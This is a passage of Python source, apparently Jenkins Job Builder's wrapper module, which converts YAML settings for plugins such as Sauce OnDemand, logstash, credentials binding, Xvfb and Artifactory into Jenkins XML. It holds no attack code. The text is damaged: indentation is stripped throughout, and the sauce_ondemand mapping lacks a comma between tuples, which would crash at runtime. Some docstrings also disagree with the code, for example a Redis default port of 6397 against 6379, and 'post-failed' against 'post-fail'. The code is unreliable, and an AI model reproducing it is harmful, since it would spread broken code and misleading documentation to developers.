clouds_build_wrapper = XML.SubElement(
xml_parent, tag_prefix + 'JCloudsBuildWrapper')
instances_wrapper = XML.SubElement(
clouds_build_wrapper, 'instancesToRun')
for instance in data['instances']:
instances_to_run = XML.SubElement(
instances_wrapper, tag_prefix + 'InstancesToRun')
instance_mapping = [('cloud-name', 'cloudName', None),
('count', 'count', 1)]
if instance.get('manual-template', False):
instance_mapping.append(('template-name',
'manualTemplateName', None))
else:
instance_mapping.append(('template-name',
'templateName', None))
convert_mapping_to_xml(instances_to_run,
instance, instance_mapping, fail_required=True)
if data.get('single-use', False):
XML.SubElement(xml_parent, tag_prefix + 'JCloudsOneOffSlave')
def build_user_vars(registry, xml_parent, data):
"""yaml: build-user-vars
Set environment variables to the value of the user that started the build.
Requires the Jenkins :jenkins-wiki:`Build User Vars Plugin
<Build+User+Vars+Plugin>`.
Example::
wrappers:
- build-user-vars
"""
XML.SubElement(xml_parent, 'org.jenkinsci.plugins.builduser.BuildUser')
def release(registry, xml_parent, data):
"""yaml: release
Add release build configuration
Requires the Jenkins :jenkins-wiki:`Release Plugin <Release+Plugin>`.
:arg bool keep-forever: Keep build forever (default true)
:arg bool override-build-parameters: Enable build-parameter override
(default false)
:arg string version-template: Release version template (default '')
:arg list parameters: Release parameters (see the :ref:`Parameters` module)
:arg list pre-build: Pre-build steps (see the :ref:`Builders` module)
:arg list post-build: Post-build steps (see :ref:`Builders`)
:arg list post-success: Post successful-build steps (see :ref:`Builders`)
:arg list post-failed: Post failed-build steps (see :ref:`Builders`)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/release001.yaml
"""
relwrap = XML.SubElement(xml_parent,
'hudson.plugins.release.ReleaseWrapper')
# For 'keep-forever', the sense of the XML flag is the opposite of
# the YAML flag.
no_keep_forever = 'false'
if str(data.get('keep-forever', True)).lower() == 'false':
no_keep_forever = 'true'
XML.SubElement(relwrap, 'doNotKeepLog').text = no_keep_forever
XML.SubElement(relwrap, 'overrideBuildParameters').text = str(
data.get('override-build-parameters', False)).lower()
XML.SubElement(relwrap, 'releaseVersionTemplate').text = data.get(
'version-template', '')
parameters = data.get('parameters', [])
if parameters:
pdef = XML.SubElement(relwrap, 'parameterDefinitions')
for param in parameters:
registry.dispatch('parameter', pdef, param)
builder_steps = {
'pre-build': 'preBuildSteps',
'post-build': 'postBuildSteps',
'post-success': 'postSuccessfulBuildSteps',
'post-fail': 'postFailedBuildSteps',
}
for step in builder_steps.keys():
for builder in data.get(step, []):
registry.dispatch('builder',
XML.SubElement(relwrap, builder_steps[step]),
builder)
def sauce_ondemand(registry, xml_parent, data):
"""yaml: sauce-ondemand
Allows you to integrate Sauce OnDemand with Jenkins. You can
automate the setup and tear down of Sauce Connect and integrate
the Sauce OnDemand results videos per test. Requires the Jenkins
:jenkins-wiki:`Sauce OnDemand Plugin <Sauce+OnDemand+Plugin>`.
:arg bool enable-sauce-connect: launches a SSH tunnel from their cloud
to your private network (default false)
:arg str sauce-host: The name of the selenium host to be used. For
tests run using Sauce Connect, this should be localhost.
ondemand.saucelabs.com can also be used to conenct directly to
Sauce OnDemand, The value of the host will be stored in the
SAUCE_ONDEMAND_HOST environment variable. (default '')
:arg str sauce-port: The name of the Selenium Port to be used. For
tests run using Sauce Connect, this should be 4445. If using
ondemand.saucelabs.com for the Selenium Host, then use 4444.
The value of the port will be stored in the SAUCE_ONDEMAND_PORT
environment variable. (default '')
:arg str override-username: If set then api-access-key must be set.
Overrides the username from the global config. (default '')
:arg str override-api-access-key: If set then username must be set.
Overrides the api-access-key set in the global config. (default '')
:arg str starting-url: The value set here will be stored in the
SELENIUM_STARTING_ULR environment variable. Only used when type
is selenium. (default '')
:arg str type: Type of test to run (default selenium)
:type values:
* **selenium**
* **webdriver**
:arg list platforms: The platforms to run the tests on. Platforms
supported are dynamically retrieved from sauce labs. The format of
the values has only the first letter capitalized, no spaces, underscore
between os and version, underscore in internet_explorer, everything
else is run together. If there are not multiple version of the browser
then just the first version number is used.
Examples: Mac_10.8iphone5.1 or Windows_2003firefox10
or Windows_2012internet_explorer10 (default '')
:arg bool launch-sauce-connect-on-slave: Whether to launch sauce connect
on the slave. (default false)
:arg str https-protocol: The https protocol to use (default '')
:arg str sauce-connect-options: Options to pass to sauce connect
(default '')
Example::
wrappers:
- sauce-ondemand:
enable-sauce-connect: true
sauce-host: foo
sauce-port: 8080
override-username: foo
override-api-access-key: 123lkj123kh123l;k12323
type: webdriver
platforms:
- Linuxandroid4
- Linuxfirefox10
- Linuxfirefox11
launch-sauce-connect-on-slave: true
"""
sauce = XML.SubElement(xml_parent, 'hudson.plugins.sauce__ondemand.'
'SauceOnDemandBuildWrapper')
mapping = [
('enable-sauce-connect', 'enableSauceConnect', False),
('sauce-host', 'seleniumHost', ''),
('sauce-port', 'seleniumPort', '')
('launch-sauce-connect-on-slave', 'launchSauceConnectOnSlave', False),
('https-protocol', 'httpsProtocol', ''),
('sauce-connect-options', 'options', '')]
convert_mapping_to_xml(sauce, data, mapping, fail_required=True)
# Optional override global authentication
username = data.get('override-username')
key = data.get('override-api-access-key')
if username and key:
cred = XML.SubElement(sauce, 'credentials')
mapping = [
('override-username', 'username', None),
('override-api-access-key', 'apiKey', None)]
convert_mapping_to_xml(cred, data, mapping, fail_required=True)
atype = data.get('type', 'selenium')
info = XML.SubElement(sauce, 'seleniumInformation')
if atype == 'selenium':
selenium_mapping = [('starting-url', 'seleniumBrowsers', ''),
('', 'isWebDriver', False)]
convert_mapping_to_xml(
info, data, selenium_mapping, fail_required=True)
browsers = XML.SubElement(info, 'seleniumBrowsers')
for platform in data['platforms']:
mapping = [('', 'string', platform)]
convert_mapping_to_xml(browsers, data, mapping, fail_required=True)
XML.SubElement(sauce, 'seleniumBrowsers',
{'reference': '../seleniumInformation/'
'seleniumBrowsers'})
if atype == 'webdriver':
browsers = XML.SubElement(info, 'webDriverBrowsers')
for platform in data['platforms']:
mapping = [('', 'string', platform)]
convert_mapping_to_xml(browsers, data, mapping, fail_required=True)
webdriver_mapping = [('', 'isWebDriver', True)]
convert_mapping_to_xml(
info, data, webdriver_mapping, fail_required=True)
XML.SubElement(sauce, 'webDriverBrowsers',
{'reference': '../seleniumInformation/'
'webDriverBrowsers'})
def sonar(registry, xml_parent, data):
"""yaml: sonar
Wrapper for SonarQube Plugin
Requires :jenkins-wiki:`SonarQube plugin <SonarQube+plugin>`
:arg str install-name: Release goals and options (default '')
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/sonar-minimal.yaml
:language: yaml
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/sonar-full.yaml
:language: yaml
"""
sonar = XML.SubElement(
xml_parent, 'hudson.plugins.sonar.SonarBuildWrapper')
sonar.set('plugin', 'sonar')
if data.get('install-name'):
mapping = [
('install-name', 'installationName', ''),
]
convert_mapping_to_xml(sonar, data, mapping, fail_required=True)
def pathignore(registry, xml_parent, data):
"""yaml: pathignore
This plugin allows SCM-triggered jobs to ignore
build requests if only certain paths have changed.
Requires the Jenkins :jenkins-wiki:`Pathignore Plugin <Pathignore+Plugin>`.
:arg str ignored: A set of patterns to define ignored changes
Example::
wrappers:
- pathignore:
ignored: "docs, tests"
"""
ruby = XML.SubElement(xml_parent, 'ruby-proxy-object')
robj = XML.SubElement(ruby, 'ruby-object', attrib={
'pluginid': 'pathignore',
'ruby-class': 'Jenkins::Plugin::Proxies::BuildWrapper'
})
pluginid = XML.SubElement(robj, 'pluginid', {
'pluginid': 'pathignore', 'ruby-class': 'String'
})
pluginid.text = 'pathignore'
obj = XML.SubElement(robj, 'object', {
'ruby-class': 'PathignoreWrapper', 'pluginid': 'pathignore'
})
ignored = XML.SubElement(obj, 'ignored__paths', {
'pluginid': 'pathignore', 'ruby-class': 'String'
})
ignored.text = data.get('ignored', '')
XML.SubElement(obj, 'invert__ignore', {
'ruby-class': 'FalseClass', 'pluginid': 'pathignore'
})
def pre_scm_buildstep(registry, xml_parent, data):
"""yaml: pre-scm-buildstep
Execute a Build Step before running the SCM
Requires the Jenkins :jenkins-wiki:`pre-scm-buildstep <pre-scm-buildstep>`.
:arg string failOnError: Specifies if the job should fail on error
(plugin >= 0.3) (default false).
:arg list buildsteps: List of build steps to execute
:Buildstep: Any acceptable builder, as seen in the example
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/pre-scm-buildstep001.yaml
:language: yaml
"""
# Get plugin information to maintain backwards compatibility
info = registry.get_plugin_info('preSCMbuildstep')
version = pkg_resources.parse_version(info.get('version', "0"))
bsp = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.preSCMbuildstep.'
'PreSCMBuildStepsWrapper')
bs = XML.SubElement(bsp, 'buildSteps')
stepList = data if type(data) is list else data.get('buildsteps')
for step in stepList:
for edited_node in create_builders(registry, step):
bs.append(edited_node)
if version >= pkg_resources.parse_version("0.3"):
mapping = [('failOnError', 'failOnError', False)]
convert_mapping_to_xml(bsp, data, mapping, fail_required=True)
def logstash(registry, xml_parent, data):
"""yaml: logstash build wrapper
Dump the Jenkins console output to Logstash
Requires the Jenkins :jenkins-wiki:`logstash plugin <Logstash+Plugin>`.
:arg use-redis: Boolean to use Redis. (default true)
:arg redis: Redis config params
:Parameter: * **host** (`str`) Redis hostname\
(default 'localhost')
:Parameter: * **port** (`int`) Redis port number (default 6397)
:Parameter: * **database-number** (`int`)\
Redis database number (default 0)
:Parameter: * **database-password** (`str`)\
Redis database password (default '')
:Parameter: * **data-type** (`str`)\
Redis database type (default 'list')
:Parameter: * **key** (`str`) Redis key (default 'logstash')
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/logstash001.yaml
"""
logstash = XML.SubElement(xml_parent,
'jenkins.plugins.logstash.'
'LogstashBuildWrapper')
logstash.set('plugin', 'logstash@0.8.0')
mapping = [('use-redis', 'useRedis', True)]
convert_mapping_to_xml(logstash, data, mapping, fail_required=True)
if data.get('use-redis'):
redis_config = data.get('redis', {})
redis_sub_element = XML.SubElement(logstash, 'redis')
mapping = [
('host', 'host', 'localhost'),
('port', 'port', '6379'),
('database-number', 'numb', '0'),
('database-password', 'pass', ''),
('data-type', 'dataType', 'list'),
('key', 'key', 'logstash')]
convert_mapping_to_xml(redis_sub_element,
redis_config, mapping, fail_required=True)
def mongo_db(registry, xml_parent, data):
"""yaml: mongo-db build wrapper
Initalizes a MongoDB database while running the build.
Requires the Jenkins :jenkins-wiki:`MongoDB plugin <MongoDB+Plugin>`.
:arg str name: The name of the MongoDB install to use (required)
:arg str data-directory: Data directory for the server (default '')
:arg int port: Port for the server (default '')
:arg str startup-params: Startup parameters for the server (default '')
:arg int start-timeout: How long to wait for the server to start in
milliseconds. 0 means no timeout. (default 0)
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/mongo-db-full.yaml
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/mongo-db-minimal.yaml
"""
mongodb = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.mongodb.'
'MongoBuildWrapper')
mongodb.set('plugin', 'mongodb')
mapping = [
('name', 'mongodbName', None),
('port', 'port', ''),
('data-directory', 'dbpath', ''),
('startup-params', 'parameters', ''),
('start-timeout', 'startTimeout', 0),
]
convert_mapping_to_xml(mongodb, data, mapping, fail_required=True)
def delivery_pipeline(registry, xml_parent, data):
"""yaml: delivery-pipeline
If enabled the job will create a version based on the template.
The version will be set to the environment variable PIPELINE_VERSION and
will also be set in the downstream jobs.
Requires the Jenkins :jenkins-wiki:`Delivery Pipeline Plugin
<Delivery+Pipeline+Plugin>`.
:arg str version-template: Template for generated version e.g
1.0.${BUILD_NUMBER} (default '')
:arg bool set-display-name: Set the generated version as the display name
for the build (default false)
Minimal Example:
.. literalinclude::
/../../tests/wrappers/fixtures/delivery-pipeline-minimal.yaml
:language: yaml
Full Example:
.. literalinclude::
/../../tests/wrappers/fixtures/delivery-pipeline-full.yaml
:language: yaml
"""
pvc = XML.SubElement(
xml_parent, 'se.diabol.jenkins.pipeline.PipelineVersionContributor')
pvc.set('plugin', 'delivery-pipeline-plugin')
mapping = [
('version-template', 'versionTemplate', ''),
('set-display-name', 'updateDisplayName', False),
]
convert_mapping_to_xml(pvc, data, mapping, fail_required=True)
def matrix_tie_parent(registry, xml_parent, data):
"""yaml: matrix-tie-parent
Tie parent to a node.
Requires the Jenkins :jenkins-wiki:`Matrix Tie Parent Plugin
<Matrix+Tie+Parent+Plugin>`.
Note that from Jenkins version 1.532 this plugin's functionality is
available under the "advanced" option of the matrix project configuration.
You can use the top level ``node`` parameter to control where the parent
job is tied in Jenkins 1.532 and higher.
:arg str node: Name of the node (required)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/matrix-tie-parent.yaml
"""
mtp = XML.SubElement(xml_parent, 'matrixtieparent.BuildWrapperMtp')
mapping = [('node', 'labelName', None)]
convert_mapping_to_xml(mtp, data, mapping, fail_required=True)
def exclusion(registry, xml_parent, data):
"""yaml: exclusion
Add a resource to use for critical sections to establish a mutex on. If
another job specifies the same resource, the second job will wait for the
blocked resource to become available.
Requires the Jenkins :jenkins-wiki:`Exclusion Plugin <Exclusion-Plugin>`.
:arg list resources: List of resources to add for exclusion
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/exclusion002.yaml
"""
exl = XML.SubElement(xml_parent,
'org.jvnet.hudson.plugins.exclusion.IdAllocator')
exl.set('plugin', 'Exclusion')
ids = XML.SubElement(exl, 'ids')
resources = data.get('resources', [])
for resource in resources:
dit = XML.SubElement(ids,
'org.jvnet.hudson.plugins.exclusion.DefaultIdType')
mapping = [('', 'name', resource.upper())]
convert_mapping_to_xml(dit, data, mapping, fail_required=True)
def ssh_agent_credentials(registry, xml_parent, data):
"""yaml: ssh-agent-credentials
Sets up the user for the ssh agent plugin for jenkins.
Requires the Jenkins :jenkins-wiki:`SSH-Agent Plugin <SSH+Agent+Plugin>`.
:arg list users: A list of Jenkins users credential IDs (required)
:arg str user: The user id of the jenkins user credentials (deprecated)
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/ssh-agent-credentials002.yaml
if both **users** and **user** parameters specified, **users** will be
prefered, **user** will be ignored.
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/ssh-agent-credentials003.yaml
The **users** with one value in list equals to the **user**. In this
case old style XML will be generated. Use this format if you use
SSH-Agent plugin < 1.5.
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/ssh-agent-credentials004.yaml
equals to:
.. literalinclude::
/../../tests/wrappers/fixtures/ssh-agent-credentials001.yaml
"""
logger = logging.getLogger(__name__)
entry_xml = XML.SubElement(
xml_parent,
'com.cloudbees.jenkins.plugins.sshagent.SSHAgentBuildWrapper')
xml_key = 'user'
user_list = list()
if 'users' in data:
user_list += data['users']
if len(user_list) > 1:
entry_xml = XML.SubElement(entry_xml, 'credentialIds')
xml_key = 'string'
if 'user' in data:
logger.warning(
"Both 'users' and 'user' parameters specified for "
"ssh-agent-credentials. 'users' is used, 'user' is "
"ignored.")
elif 'user' in data:
logger.warning("The 'user' param has been deprecated, "
"use the 'users' param instead.")
user_list.append(data['user'])
else:
raise JenkinsJobsException("Missing 'user' or 'users' parameter "
"for ssh-agent-credentials")
for user in user_list:
XML.SubElement(entry_xml, xml_key).text = user
def credentials_binding(registry, xml_parent, data):
"""yaml: credentials-binding
Binds credentials to environment variables using the credentials binding
plugin for jenkins.
Requires the Jenkins :jenkins-wiki:`Credentials Binding Plugin
<Credentials+Binding+Plugin>` version 1.1 or greater.
:arg list binding-type: List of each bindings to create. Bindings may be
of type `zip-file`, `file`, `username-password`, `text`,
`username-password-separated` or `amazon-web-services`.
username-password sets a variable to the username and password given in
the credentials, separated by a colon.
username-password-separated sets one variable to the username and one
variable to the password given in the credentials.
amazon-web-services sets one variable to the access key and one
variable to the secret access key. Requires the
:jenkins-wiki:`AWS Credentials Plugin <CloudBees+AWS+Credentials+Plugin>`
.
:Parameters: * **credential-id** (`str`) UUID of the credential being
referenced
* **variable** (`str`) Environment variable where the
credential will be stored
* **username** (`str`) Environment variable for the
username (Required for binding-type
username-password-separated)
* **password** (`str`) Environment variable for the
password (Required for binding-type
username-password-separated)
* **access-key** (`str`) Environment variable for the
access key (Required for binding-type
amazon-web-services)
* **secret-key** (`str`) Environment variable for the
access secret key (Required for binding-type
amazon-web-services)
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/credentials_binding.yaml
:language: yaml
"""
entry_xml = xml_parent.find(
'org.jenkinsci.plugins.credentialsbinding.impl.SecretBuildWrapper')
if entry_xml is None:
entry_xml = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.credentialsbinding.impl.SecretBuildWrapper')
bindings_xml = entry_xml.find('bindings')
if bindings_xml is None:
bindings_xml = XML.SubElement(entry_xml, 'bindings')
binding_types = {
'zip-file': 'org.jenkinsci.plugins.credentialsbinding.impl.'
'ZipFileBinding',
'file': 'org.jenkinsci.plugins.credentialsbinding.impl.FileBinding',
'username-password': 'org.jenkinsci.plugins.credentialsbinding.impl.'
'UsernamePasswordBinding',
'username-password-separated': 'org.jenkinsci.plugins.'
'credentialsbinding.impl.'
'UsernamePasswordMultiBinding',
'text': 'org.jenkinsci.plugins.credentialsbinding.impl.StringBinding',
'amazon-web-services':
'com.cloudbees.jenkins.plugins.awscredentials'
'.AmazonWebServicesCredentialsBinding'
}
for binding in data:
for binding_type, params in binding.items():
if binding_type not in binding_types.keys():
raise JenkinsJobsException('binding-type must be one of %r' %
binding_types.keys())
binding_xml = XML.SubElement(bindings_xml,
binding_types[binding_type])
if binding_type == 'username-password-separated':
mapping = [
('username', 'usernameVariable', None),
('password', 'passwordVariable', None)]
convert_mapping_to_xml(
binding_xml, params, mapping, fail_required=True)
elif binding_type == 'amazon-web-services':
mapping = [
('access-key', 'accessKeyVariable', None),
('secret-key', 'secretKeyVariable', None)]
convert_mapping_to_xml(
binding_xml, params, mapping, fail_required=True)
else:
mapping = [('variable', 'variable', None)]
convert_mapping_to_xml(
binding_xml, params, mapping, fail_required=False)
mapping = [('credential-id', 'credentialsId', None)]
convert_mapping_to_xml(binding_xml,
params, mapping, fail_required=False)
def custom_tools(registry, xml_parent, data):
"""yaml: custom-tools
Requires the Jenkins :jenkins-wiki:`Custom Tools Plugin
<Custom+Tools+Plugin>`.
:arg list tools: List of custom tools to add
(optional)
:arg bool skip-master-install: skips the install in top level matrix job
(default 'false')
:arg bool convert-homes-to-upper: Converts the home env vars to uppercase
(default 'false')
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/custom-tools001.yaml
"""
base = 'com.cloudbees.jenkins.plugins.customtools'
wrapper = XML.SubElement(xml_parent,
base + ".CustomToolInstallWrapper")
wrapper_tools = XML.SubElement(wrapper, 'selectedTools')
tools = data.get('tools', [])
tool_node = base + '.CustomToolInstallWrapper_-SelectedTool'
for tool in tools:
tool_wrapper = XML.SubElement(wrapper_tools, tool_node)
mapping = [('', 'name', tool)]
convert_mapping_to_xml(tool_wrapper, data, mapping, fail_required=True)
opts = XML.SubElement(wrapper,
'multiconfigOptions')
mapping = [('skip-master-install', 'skipMasterInstallation', False)]
convert_mapping_to_xml(opts, data, mapping, fail_required=True)
mapping = [('convert-homes-to-upper', 'convertHomesToUppercase', False)]
convert_mapping_to_xml(wrapper, data, mapping, fail_required=True)
def nodejs_installator(registry, xml_parent, data):
"""yaml: nodejs-installator
Requires the Jenkins :jenkins-wiki:`NodeJS Plugin
<NodeJS+Plugin>`.
:arg str name: nodejs installation name (required)
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/nodejs-installator001.yaml
"""
npm_node = XML.SubElement(xml_parent,
'jenkins.plugins.nodejs.tools.'
'NpmPackagesBuildWrapper')
mapping = [('name', 'nodeJSInstallationName', None)]
convert_mapping_to_xml(npm_node, data, mapping, fail_required=True)
def xvnc(registry, xml_parent, data):
"""yaml: xvnc
Enable xvnc during the build.
Requires the Jenkins :jenkins-wiki:`xvnc plugin <Xvnc+Plugin>`.
:arg bool screenshot: Take screenshot upon build completion (default false)
:arg bool xauthority: Create a dedicated Xauthority file per build (default
true)
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/xvnc-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/xvnc-minimal.yaml
:language: yaml
"""
xwrapper = XML.SubElement(xml_parent,
'hudson.plugins.xvnc.Xvnc')
xwrapper.set('plugin', 'xvnc')
mapping = [
('screenshot', 'takeScreenshot', False),
('xauthority', 'useXauthority', True),
]
convert_mapping_to_xml(xwrapper, data, mapping, fail_required=True)
def job_log_logger(registry, xml_parent, data):
"""yaml: job-log-logger
Enable writing the job log to the underlying logging system.
Requires the Jenkins :jenkins-wiki:`Job Log Logger plugin
<Job+Log+Logger+Plugin>`.
:arg bool suppress-empty: Suppress empty log messages
(default true)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/job-log-logger001.yaml
"""
top = XML.SubElement(xml_parent,
'org.jenkins.ci.plugins.jobloglogger.'
'JobLogLoggerBuildWrapper')
mapping = [('suppress-empty', 'suppressEmpty', True)]
convert_mapping_to_xml(top, data, mapping, fail_required=True)
def xvfb(registry, xml_parent, data):
"""yaml: xvfb
Enable xvfb during the build.
Requires the Jenkins :jenkins-wiki:`Xvfb Plugin <Xvfb+Plugin>`.
:arg str installation-name: The name of the Xvfb tool instalation (default
'default')
:arg bool auto-display-name: Uses the -displayfd option of Xvfb by which it
chooses it's own display name (default false)
:arg str display-name: Ordinal of the display Xvfb will be running on, if
left empty choosen based on current build executor number (default '')
:arg str assigned-labels: If you want to start Xvfb only on specific nodes
specify its name or label (default '')
:arg bool parallel-build: When running multiple Jenkins nodes on the same
machine this setting influences the display number generation (default
false)
:arg int timeout: A timeout of given seconds to wait before returning
control to the job (default 0)
:arg str screen: Resolution and color depth. (default '1024x768x24')
:arg int display-name-offset: Offset for display names. (default 1)
:arg str additional-options: Additional options to be added with the
options above to the Xvfb command line (default '')
:arg bool debug: If Xvfb output should appear in console log of this job
(default false)
:arg bool shutdown-with-build: Should the display be kept until the whole
job ends (default false)
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/xvfb-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/xvfb-minimal.yaml
:language: yaml
"""
xwrapper = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.xvfb.XvfbBuildWrapper')
mapping = [
('installation-name', 'installationName', 'default'),
('auto-display-name', 'autoDisplayName', False),
('display-name', 'displayName', ''),
('assigned-labels', 'assignedLabels', ''),
('parallel-build', 'parallelBuild', False),
('timeout', 'timeout', 0),
('screen', 'screen', '1024x768x24'),
('display-name-offset', 'displayNameOffset', 1),
('additional-options', 'additionalOptions', ''),
('debug', 'debug', False),
('shutdown-with-build', 'shutdownWithBuild', False),
]
convert_mapping_to_xml(xwrapper, data, mapping, fail_required=True)
def android_emulator(registry, xml_parent, data):
"""yaml: android-emulator
Automates many Android development tasks including SDK installation,
build file generation, emulator creation and launch,
APK (un)installation...
Requires the Jenkins :jenkins-wiki:`Android Emulator Plugin
<Android+Emulator+Plugin>`.
:arg str avd: Enter the name of an existing Android emulator configuration.
If this is exclusive with the 'os' arg.
:arg str os: Can be an OS version, target name or SDK add-on
:arg str screen-density: Density in dots-per-inch (dpi) or as an alias,
e.g. "160" or "mdpi". (default mdpi)
:arg str screen-resolution: Can be either a named resolution or explicit
size, e.g. "WVGA" or "480x800". (default WVGA)
:arg str locale: Language and country pair. (default en_US)
:arg str target-abi: Name of the ABI / system image to be used. (optional)
:arg str sd-card: sd-card size e.g. "32M" or "10240K". (optional)
:arg bool wipe: if true, the emulator will have its user data reset at
start-up (default false)
:arg bool show-window: if true, the Android emulator user interface will
be displayed on screen during the build. (default false)
:arg bool snapshot: Start emulator from stored state (default false)
:arg bool delete: Delete Android emulator at the end of build
(default false)
:arg int startup-delay: Wait this many seconds before attempting
to start the emulator (default 0)
:arg str commandline-options: Will be given when starting the
Android emulator executable (optional)
:arg str exe: The emulator executable. (optional)
:arg list hardware-properties: Dictionary of hardware properties. Allows
you to override the default values for an AVD. (optional)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/android003.yaml
"""
root = XML.SubElement(xml_parent,
'hudson.plugins.android__emulator.AndroidEmulator')
if data.get('avd') and data.get('os'):
raise JenkinsJobsException("'avd' and 'os' options are "
"exclusive, please pick one only")
if not data.get('avd') and not data.get('os'):
raise JenkinsJobsException("AndroidEmulator requires an AVD name or"
"OS version to run: specify 'os' or 'avd'")
if data.get('avd'):
XML.SubElement(root, 'avdName').text = str(data['avd'])
else:
mapping = [
('os', 'osVersion', None),
('screen-density', 'screenDensity', 'mdpi'),
('screen-resolution', 'screenResolution', 'WVGA'),
('locale', 'deviceLocale', 'en_US'),
('target-abi', 'targetAbi', ''),
('sd-card', 'sdCardSize', '')
]
convert_mapping_to_xml(root, data, mapping, fail_required=True)
hardware = XML.SubElement(root, 'hardwareProperties')
for prop_name, prop_val in data.get('hardware-properties', {}).items():
prop_node = XML.SubElement(hardware,
'hudson.plugins.android__emulator'
'.AndroidEmulator_-HardwareProperty')
mapping = [
('', 'key', prop_name),
('', 'value', prop_val)]
convert_mapping_to_xml(prop_node, data, mapping, fail_required=True)
mapping = [
('wipe', 'wipeData', False),
('show-window', 'showWindow', False),
('snapshot', 'useSnapshots', False),
('delete', 'deleteAfterBuild', False),
('startup-delay', 'startupDelay', 0),
('commandline-options', 'commandLineOptions', ''),
('exe', 'executable', ''),
]
convert_mapping_to_xml(root, data, mapping, fail_required=True)
def artifactory_maven(registry, xml_parent, data):
"""yaml: artifactory-maven
Wrapper for non-Maven projects. Requires the
:jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`
:arg str url: URL of the Artifactory server. e.g.
https://www.jfrog.com/artifactory/ (default '')
:arg str name: Artifactory user with permissions use for
connected to the selected Artifactory Server
(default '')
:arg str repo-key: Name of the repository to search for
artifact dependencies. Provide a single repo-key or provide
separate release-repo-key and snapshot-repo-key.
:arg str release-repo-key: Release repository name. Value of
repo-key take priority over release-repo-key if provided.
:arg str snapshot-repo-key: Snapshots repository name. Value of
repo-key take priority over release-repo-key if provided.
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/artifactory001.yaml
:language: yaml
"""
artifactory = XML.SubElement(
xml_parent,
'org.jfrog.hudson.maven3.ArtifactoryMaven3NativeConfigurator')
# details
details = XML.SubElement(artifactory, 'details')
artifactory_common_details(details, data)
if 'repo-key' in data:
mapping = [('repo-key', 'downloadRepositoryKey', None)]
else:
mapping = [
('snapshot-repo-key', 'downloadSnapshotRepositoryKey', ''),
('release-repo-key', 'downloadReleaseRepositoryKey', '')]
convert_mapping_to_xml(details, data, mapping, fail_required=True)
def artifactory_generic(registry, xml_parent, data):
"""yaml: artifactory-generic
Wrapper for non-Maven projects. Requires the
:jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`
:arg str url: URL of the Artifactory server. e.g.
https://www.jfrog.com/artifactory/ (default '')
:arg str name: Artifactory user with permissions use for
connected to the selected Artifactory Server
(default '')
:arg str repo-key: Release repository name (plugin < 2.3.0) (default '')
:arg str snapshot-repo-key: Snapshots repository name (plugin < 2.3.0)
(default '')
:arg str key-from-select: Repository key to use (plugin >= 2.3.0)
(default '')
:arg str key-from-text: Repository key to use that can be configured
dynamically using Jenkins variables (plugin >= 2.3.0) (default '')
:arg list deploy-pattern: List of patterns for mappings
build artifacts to published artifacts. Supports Ant-style wildcards
mapping to target directories. E.g.: */*.zip=>dir (default [])
:arg list resolve-pattern: List of references to other
artifacts that this build should use as dependencies.
:arg list matrix-params: List of properties to attach to all deployed
artifacts in addition to the default ones: build.name, build.number,
and vcs.revision (default [])
:arg bool deploy-build-info: Deploy jenkins build metadata with
artifacts to Artifactory (default false)
:arg bool env-vars-include: Include environment variables accessible by
the build process. Jenkins-specific env variables are always included.
Use the env-vars-include-patterns and env-vars-exclude-patterns to
filter the environment variables published to artifactory.
(default false)
:arg list env-vars-include-patterns: List of environment variable patterns
for including env vars as part of the published build info. Environment
variables may contain the * and the ? wildcards (default [])
:arg list env-vars-exclude-patterns: List of environment variable patterns
that determine the env vars excluded from the published build info
(default [])
:arg bool discard-old-builds:
Remove older build info from Artifactory (default false)
:arg bool discard-build-artifacts:
Remove older build artifacts from Artifactory (default false)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/artifactory002.yaml
:language: yaml
"""
artifactory = XML.SubElement(
xml_parent,
'org.jfrog.hudson.generic.ArtifactoryGenericConfigurator')
# details
details = XML.SubElement(artifactory, 'details')
artifactory_common_details(details, data)
# Get plugin information to maintain backwards compatibility
info = registry.get_plugin_info('artifactory')
# Note: Assume latest version of plugin is preferred config format
version = pkg_resources.parse_version(
info.get('version', str(sys.maxsize)))
if version >= pkg_resources.parse_version('2.3.0'):
deployReleaseRepo = XML.SubElement(details, 'deployReleaseRepository')
XML.SubElement(deployReleaseRepo, 'keyFromText').text = data.get(
'key-from-text', '')
XML.SubElement(deployReleaseRepo, 'keyFromSelect').text = data.get(
'key-from-select', '')
XML.SubElement(deployReleaseRepo, 'dynamicMode').text = str(
'key-from-text' in data.keys()).lower()
else:
XML.SubElement(details, 'repositoryKey').text = data.get(
'repo-key', '')
XML.SubElement(details, 'snapshotsRepositoryKey').text = data.get(
'snapshot-repo-key', '')
XML.SubElement(artifactory, 'deployPattern').text = ','.join(data.get(
'deploy-pattern', []))
XML.SubElement(artifactory, 'resolvePattern').text = ','.join(
data.get('resolve-pattern', []))
XML.SubElement(artifactory, 'matrixParams').text = ','.join(
data.get('matrix-params', []))
XML.SubElement(artifactory, 'deployBuildInfo').text = str(
data.get('deploy-build-info', False)).lower()
XML.SubElement(artifactory, 'includeEnvVars').text = str(
